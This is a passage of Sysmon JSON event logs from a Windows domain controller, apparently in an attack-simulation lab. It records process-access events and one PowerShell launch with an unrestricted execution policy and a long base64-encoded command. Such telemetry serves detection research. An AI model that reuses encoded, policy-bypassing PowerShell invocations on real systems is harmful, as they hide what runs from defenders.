ws\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4323,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4324,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4325,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4326,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4327,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4328,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-00106C530600}\r\nSourceProcessId: 4344\r\nSourceThreadId: 644\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-0010BE550600}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-00106C530600}","SourceProcessId":"4344","SourceThreadId":"644","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-0010BE550600}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4329,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.820\r\nProcessGuid: {A837DB8D-030D-5F25-0000-00108D560600}\r\nProcessId: 4504\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-030D-5F25-0000-0020B5520600}\r\nLogonId: 0x652B5\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-030D-5F25-0000-0010BE550600}\r\nParentProcessId: 4980\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBA